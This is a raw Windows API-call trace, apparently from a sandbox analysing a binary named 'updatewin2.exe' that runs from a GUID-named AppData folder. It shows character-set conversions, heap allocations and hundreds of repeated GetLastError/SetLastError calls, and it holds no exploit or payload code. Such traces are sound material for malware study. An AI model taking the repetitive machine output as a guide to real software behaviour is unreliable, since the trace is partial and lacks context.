¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ|¼z\x0c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.078] GetLastError () returned 0x0 [0129.078] SetLastError (dwErrCode=0x0) [0129.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ挙ฑ㞅AĀ") returned 256 [0129.078] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ挙ฑ㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0129.078] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ挙ฑ㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0129.078] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ|¼z\x0c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.078] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe")) returned 0x5f [0129.078] GetLastError () returned 0x0 [0129.078] SetLastError (dwErrCode=0x0) [0129.078] GetLastError () returned 0x0 [0129.078] SetLastError (dwErrCode=0x0) [0129.078] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.079] SetLastError (dwErrCode=0x0) [0129.079] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.080] SetLastError (dwErrCode=0x0) [0129.080] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.081] SetLastError (dwErrCode=0x0) [0129.081] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.082] GetLastError () returned 0x0 [0129.082] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.083] SetLastError (dwErrCode=0x0) [0129.083] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.084] GetLastError () returned 0x0 [0129.084] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.085] GetLastError () returned 0x0 [0129.085] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.086] GetLastError () returned 0x0 [0129.086] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.087] SetLastError (dwErrCode=0x0) [0129.087] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2b1990 [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.088] SetLastError (dwErrCode=0x0) [0129.088] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.089] SetLastError (dwErrCode=0x0) [0129.089] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.090] SetLastError (dwErrCode=0x0) [0129.090] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.091] GetLastError () returned 0x0 [0129.091] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.092] SetLastError (dwErrCode=0x0) [0129.092] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.093] SetLastError (dwErrCode=0x0) [0129.093] GetLastError () returned 0x0 [0129.094] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.128] SetLastError (dwErrCode=0x0) [0129.128] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.129] SetLastError (dwErrCode=0x0) [0129.129] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.130] SetLastError (dwErrCode=0x0) [0129.130] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.131] SetLastError (dwErrCode=0x0) [0129.131] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] GetLastError () returned 0x0 [0129.132] SetLastError (dwErrCode=0x0) [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x98) returned 0x2b1a00 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1f) returned 0x2b1aa0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2b1ac8 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x37) returned 0x2b1b08 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2b1b48 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x31) returned 0x2b1b90 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2b1bd0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2b1bf0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2b1c20 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd) returned 0x2b1c40 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x25) returned 0x2b1c58 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x39) returned 0x2b1c88 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2b1cd0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2b1cf0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe) returned 0x2b1d10 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x69) returned 0x2b1d28 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2b1da0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2b1de8 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1d) returned 0x2b1e10 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2b1e38 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2b1e88 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2b1ea8 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2b1ec8 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2b1ef0 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2b1f20 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2b1f58 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x41) returned 0x2b1f80 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2b1fd0 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xf) returned 0x2b1ff0 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2b2008 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2b2028 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2b2060 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x15) returned 0x2b2098 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2b20b8 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2b20e0 [0129.133] 